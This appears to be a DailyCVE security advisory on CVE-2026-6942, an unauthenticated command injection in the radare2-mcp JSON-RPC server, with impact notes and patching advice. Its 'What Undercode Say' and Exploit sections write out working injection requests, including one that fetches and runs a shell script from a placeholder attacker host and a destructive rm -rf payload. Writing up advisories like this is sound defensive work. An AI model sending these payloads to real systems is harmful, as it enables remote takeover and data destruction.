radare2-mcp OS Command Injection, CVE-2026-6942 (Critical) -DC-Jun2026-218

By /

Listen to this Post

Intro

CVE-2026-6942 is an OS command injection vulnerability in radare2-mcp, the Model Context Protocol (MCP) server implementation for the open-source reverse-engineering framework radare2. Affecting versions 1.6.0 and earlier, this flaw allows remote, unauthenticated attackers to execute arbitrary system commands by injecting shell metacharacters through the JSON-RPC interface. The vulnerability resides in the `r2_cmd_str()` function, which processes user-controlled input without adequately neutralizing special elements such as !, ;, |, &, $, `, and others. Attackers can craft malicious JSON-RPC requests where parameters include these metacharacters, effectively bypassing any command filtering that may be in place. Since the radare2-mcp service listens on a network port by default, this vulnerability is remotely exploitable with low attack complexity and no required user interaction, leading to full system compromise. The issue was discovered and reported by security researcher Manthan Ghasadiya, and a fix has been released in version 1.7.0, which introduces sandboxing mechanisms through the `cfg.sandbox` and `cfg.sandbox.grain` configuration options, defaulting to restricting `exec` and `socket` capabilities. As of the disclosure date, no public proof-of-concept exploit exists, but the widespread use of radare2 in security analysis and binary reverse-engineering makes this a critical risk for any exposed instance. Administrators are strongly advised to upgrade immediately or restrict network access to the JSON-RPC interface until patching is complete. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 score of 9.3, reflecting its severe impact on confidentiality, integrity, and availability.

DailyCVE Form

Platform: ……. radare2-mcp
Version: …….. <=1.6.0
Vulnerability: .. OS Command Injection
Severity: ……. Critical (9.8)
date: ……….. 2026-04-23

Prediction: …… Patch 2026-04-24

What Undercode Say

Check vulnerable version
r2-mcp --version
Simulate vulnerable command injection via JSON-RPC
curl -X POST http://target:port/jsonrpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"cmd","params":["!id > /tmp/pwned"],"id":1}'
Another injection example using command chaining
curl -X POST http://target:port/jsonrpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"cmd","params":["; wget http://attacker/shell.sh | bash"],"id":2}'
Enumerate running radare2-mcp processes
ps aux | grep radare2-mcp
Test for vulnerability using sleep payload
time curl -X POST http://target:port/jsonrpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"cmd","params":["; sleep 5"],"id":3}'

Exploit

Remote attackers can exploit this vulnerability by sending crafted JSON-RPC requests to the radare2-mcp service. The `params` array in the JSON body passes user-supplied strings to r2_cmd_str(), which fails to sanitize shell metacharacters. Attackers can insert command separators like ;, |, &, or backticks to execute arbitrary OS commands on the host. For example, a payload like `”; rm -rf /tmp/”` would delete files in the `/tmp` directory. Since the service runs without authentication, any network-accessible instance is at immediate risk. Attackers can achieve complete remote code execution, install backdoors, exfiltrate sensitive data, or pivot to internal networks. No user interaction or special privileges are required, making exploitation trivial.

Protection

  1. Upgrade radare2-mcp to version 1.7.0 or later, where sandboxing (cfg.sandbox and cfg.sandbox.grain) restricts `exec` and `socket` capabilities.
  2. Restrict network access to the JSON-RPC interface using firewall rules or network segmentation, allowing only trusted IP addresses.
  3. Disable the radare2-mcp service if not actively needed, or run it in a containerized environment with minimal privileges.
  4. Implement input validation at the application or WAF level to block requests containing shell metacharacters (;, |, &, $, `, !, etc.).
  5. Monitor logs for suspicious JSON-RPC requests containing command injection patterns.

Impact

  • Confidentiality: Attackers can read arbitrary files, including sensitive configuration and data.
  • Integrity: Malicious commands can modify or delete critical system files and binaries.
  • Availability: Denial-of-service conditions can be triggered by resource-intensive commands or by crashing the service.
  • Lateral Movement: Compromised host can be used as a foothold to pivot within the network.
  • Privilege Escalation: If radare2-mcp runs with elevated privileges (e.g., for debugging), attackers may gain root-level access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top